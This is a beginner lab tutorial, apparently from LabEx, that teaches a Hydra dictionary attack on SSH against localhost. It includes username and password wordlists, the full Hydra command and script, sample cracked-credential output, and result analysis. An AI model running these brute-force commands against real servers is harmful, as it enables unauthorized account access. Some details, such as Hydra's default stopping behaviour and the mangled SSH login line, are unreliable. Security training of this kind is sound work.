LabEx
Log InJoin For Free

Perform a Dictionary Attack on SSH with Hydra

HydraHydraBeginner
Practice Now

Introduction

In this lab, you will learn how to conduct a dictionary attack on SSH services using Hydra, a powerful password-cracking tool. You'll explore the process of generating username and password lists, configuring attack parameters, and executing targeted brute-force attempts against an SSH server.

The lab provides hands-on experience with Hydra's command structure, output interpretation, and result analysis. You'll practice verifying input files, launching attacks, and identifying successful login credentials while understanding common failure patterns.

Skills Graph

%%%%{init: {'theme':'neutral'}}%%%% flowchart RL hydra(("Hydra")) -.-> hydra/HydraGroup(["Hydra"]) hydra/HydraGroup -.-> hydra/basic_structure("Basic Command Structure") hydra/HydraGroup -.-> hydra/single_username("Single Username Attack") hydra/HydraGroup -.-> hydra/single_password("Single Password Attack") hydra/HydraGroup -.-> hydra/ssh_attack("SSH Brute Force") hydra/HydraGroup -.-> hydra/output_saving("Output File Saving") hydra/HydraGroup -.-> hydra/verbose_mode("Verbose Mode Usage") hydra/HydraGroup -.-> hydra/success_detection("Login Success Detection") hydra/HydraGroup -.-> hydra/error_handling("Error Message Handling") subgraph Lab Skills hydra/basic_structure -.-> lab-549919{{"Perform a Dictionary Attack on SSH with Hydra"}} hydra/single_username -.-> lab-549919{{"Perform a Dictionary Attack on SSH with Hydra"}} hydra/single_password -.-> lab-549919{{"Perform a Dictionary Attack on SSH with Hydra"}} hydra/ssh_attack -.-> lab-549919{{"Perform a Dictionary Attack on SSH with Hydra"}} hydra/output_saving -.-> lab-549919{{"Perform a Dictionary Attack on SSH with Hydra"}} hydra/verbose_mode -.-> lab-549919{{"Perform a Dictionary Attack on SSH with Hydra"}} hydra/success_detection -.-> lab-549919{{"Perform a Dictionary Attack on SSH with Hydra"}} hydra/error_handling -.-> lab-549919{{"Perform a Dictionary Attack on SSH with Hydra"}} end

Load Username and Password Lists

In this step, you will prepare the essential components for a dictionary attack - username and password lists. A dictionary attack works by systematically trying every word in a predefined list (dictionary) as potential credentials. For SSH attacks, we need two separate files: one containing possible usernames and another containing possible passwords.

  1. First, navigate to the project directory where we'll store our files. This keeps everything organized:
cd ~/project
  1. We'll create our username list using nano, a simple text editor. The filename usernames.txt is conventional but you could name it differently:
nano usernames.txt
  1. In the nano editor, enter common SSH usernames that systems might use. Each username should be on its own line. These are typical default or common usernames administrators might use:
admin
root
user
test
guest
labex

  1. To save in nano: press Ctrl+O (the letter O), then Enter to confirm the filename. Exit nano with Ctrl+X. This returns you to the command line.

  2. Now create the password file using the same process. Weak passwords like these are surprisingly common in real systems:

nano passwords.txt
  1. Enter these common passwords, one per line. Notice some match our usernames - people often use the same string for both:
password
123456
admin
qwerty
letmein
labex

  1. Save and exit nano as before (Ctrl+O, Enter, Ctrl+X).

  2. Let's verify our files were created correctly. The ls -l command shows the files exist, while cat displays their contents. This is an important quality check before proceeding:

ls -l usernames.txt passwords.txt
cat usernames.txt
cat passwords.txt

You should see both files listed with their sizes, followed by their contents displayed. These files form the basis of our dictionary attack - Hydra will systematically try every username/password combination from these lists against the SSH server in the next steps.

Set Up Hydra for SSH Dictionary Attack

In this step, you will configure Hydra to perform an SSH dictionary attack using the username and password lists created in the previous step. A dictionary attack is a method where Hydra systematically tries all possible combinations from your wordlists to find valid credentials.

  1. First, ensure you are in the correct working directory where your project files are stored:
cd ~/project

This command changes your current directory to the project folder where we'll be working.

  1. Verify that Hydra is installed by checking its version:
hydra -v

You should see output showing the Hydra version installed. This confirms Hydra is ready to use and helps troubleshoot if any issues arise later.

  1. Create a target file named target.txt containing the IP address of the local SSH server:
echo "127.0.0.1" > target.txt

We're using 127.0.0.1 (localhost) as our target because we're testing against our own machine in this lab environment.

  1. Understand the basic Hydra command structure for SSH attacks:
hydra -L <username_list> -P <password_list> <target> ssh

This shows the minimum required parameters: username list (-L), password list (-P), target IP/hostname, and the service (ssh) we're attacking.

  1. Prepare the actual Hydra command using your files (but don't run it yet):
hydra -L usernames.txt -P passwords.txt -t 4 -vV 127.0.0.1 ssh

Where:

  • -L specifies the username list file (usernames.txt)
  • -P specifies the password list file (passwords.txt)
  • -t 4 sets the number of parallel connections (4 threads for faster testing)
  • -vV enables verbose output so you can see the attack progress
  1. Save this command to a script file for execution in the next step:
echo 'hydra -L usernames.txt -P passwords.txt -t 4 -vV 127.0.0.1 ssh' > attack.sh
chmod +x attack.sh

Creating a script makes it easier to rerun the attack and ensures you don't mistype the command. The chmod command makes the script executable.

  1. Verify all required files are present before proceeding:
ls -l usernames.txt passwords.txt target.txt attack.sh

This final check confirms you have all necessary files: username list, password list, target file, and your attack script.

Execute the SSH Dictionary Attack

In this step, you will run the Hydra SSH dictionary attack using the configuration prepared in previous steps. Hydra is a popular password-cracking tool that systematically tries different username and password combinations against a service like SSH.

  1. First, ensure you are in the correct working directory where your attack script is located. This is important because Hydra needs access to your wordlists and configuration files:
cd ~/project
  1. Verify the attack script is ready by displaying its contents. This lets you double-check the Hydra command parameters before execution:
cat attack.sh

You should see the Hydra command we prepared earlier with the correct target IP, port, and wordlist paths.

  1. Before executing, ensure the SSH service is running on localhost since we're testing against our own machine. Hydra needs an active SSH service to attempt connections:
sudo service ssh status

If not running, start it with:

sudo service ssh start
  1. Execute the attack script. This will launch Hydra with all the parameters we configured:
./attack.sh
  1. Observe the attack progress in real-time. Hydra will provide live feedback showing:
  • Each connection attempt with username/password combinations
  • Successful logins (highlighted when found)
  • Failed attempts (the majority of output)
  • Final statistics including success rate and time taken
  1. Expected output will look similar to this when a credential is found:
[DATA] attacking ssh://127.0.0.1:22/
[VERBOSE] Resolving addresses ... done
[22][ssh] host: 127.0.0.1   login: labex   password: labex
1 of 1 target successfully completed, 1 valid password found
  1. The attack will automatically stop under these conditions:
  • When all combinations from your wordlists are tested
  • When a valid credential is found (Hydra's default behavior)
  • If you manually interrupt with Ctrl+C
  1. To save results to a file for later analysis, redirect the output. This creates a permanent record of all attempts and results:
./attack.sh > attack_results.txt

View Successful Login Results

In this step, you will analyze the results of your SSH dictionary attack to identify successful login attempts. When performing security testing, it's crucial to properly document and verify your findings before proceeding with further analysis.

  1. First, navigate to your project directory where all your lab files are stored:
cd ~/project
  1. Check if you have saved the attack results from the previous step. The ls -l command shows detailed file information including creation time and permissions:
ls -l attack_results.txt
  1. If you didn't save results earlier, run this command to generate them now. The > symbol redirects Hydra's output to a text file for later analysis:
./attack.sh > attack_results.txt
  1. View the complete attack results. The cat command displays the entire contents of a file in your terminal:
cat attack_results.txt
  1. Look for successful login entries, which will appear similar to this format. Each successful attempt contains three key pieces of information:
[22][ssh] host: 127.0.0.1   login: labex   password: labex
  1. To extract just the successful attempts from potentially large result files, use grep to filter lines containing "login:". This saves time when reviewing results:
grep "login:" attack_results.txt
  1. The output format shows three important elements that you'll need for verification:
  • Target IP address (127.0.0.1) - the machine that accepted the credentials
  • Successful username (login) - the valid account name
  • Valid password - the matching password for that account
  1. Verify the credentials by attempting an SSH login. This confirms the credentials actually work in a real SSH session:
ssh [email protected]

Type "yes" to accept the host key if prompted (this happens on first connection), then enter the password when requested.

  1. After successful login, properly exit the SSH session to return to your local terminal:
exit
  1. For better readability, format the results with this command pipeline. The awk command restructures the output into clear labeled fields:
grep "login:" attack_results.txt | awk '{print "Host:",$3,"| Username:",$5,"| Password:",$7}'

Understand Attack Failure Messages

In this step, we'll examine the output from your Hydra SSH attack to understand why certain login attempts failed. Analyzing these failure messages is crucial for both security professionals assessing system vulnerabilities and penetration testers refining their attack strategies.

  1. First, let's navigate to your project directory where the attack results are stored. This ensures we're working with the correct files:
cd ~/project
  1. Now we'll view the complete attack results file. This contains all the output from Hydra's attempts to login:
cat attack_results.txt
  1. To focus specifically on failed attempts, we'll filter out successful logins and look for common error patterns. The grep commands help isolate important failure messages:
grep -v "login:" attack_results.txt | grep -E "invalid|failed|error"
  1. Here are the most common failure messages you'll encounter and what they actually mean:
  • invalid password: The username was correct but the password didn't match
  • invalid user: The username doesn't exist on the target system
  • connection refused: The SSH service isn't running on the target
  • connection timeout: Network issues or a firewall is blocking access
  • too many connections: The target has detected and blocked rapid login attempts
  1. Let's quantify how many of each failure type occurred. Counting these helps understand attack patterns:
grep -c "invalid password" attack_results.txt
grep -c "invalid user" attack_results.txt
  1. To see if failures occurred at specific times (which might indicate rate limiting), we'll extract and count timestamps:
grep "invalid" attack_results.txt | awk '{print $1}' | uniq -c
  1. Now we'll create a simple summary report of the failures. This organized view helps document your findings:
echo "Attack Failure Analysis" > failure_analysis.txt
echo "Invalid passwords: $(grep -c 'invalid password' attack_results.txt)" >> failure_analysis.txt
echo "Invalid users: $(grep -c 'invalid user' attack_results.txt)" >> failure_analysis.txt
cat failure_analysis.txt
  1. For deeper investigation, we can check the target system's SSH logs (if you have access). These often contain more detailed error information:
sudo grep 'sshd' /var/log/auth.log | tail -20

Summary

In this lab, you have learned how to conduct a dictionary attack on SSH using Hydra by preparing username and password lists. The process included creating credential files, verifying their contents, and structuring the Hydra command with proper flags (-L, -P, and -t) for an effective attack.

Additionally, you explored interpreting Hydra's output to identify successful logins and analyze attack results. This lab demonstrated the importance of proper file preparation, command configuration, and systematic testing in SSH credential attacks.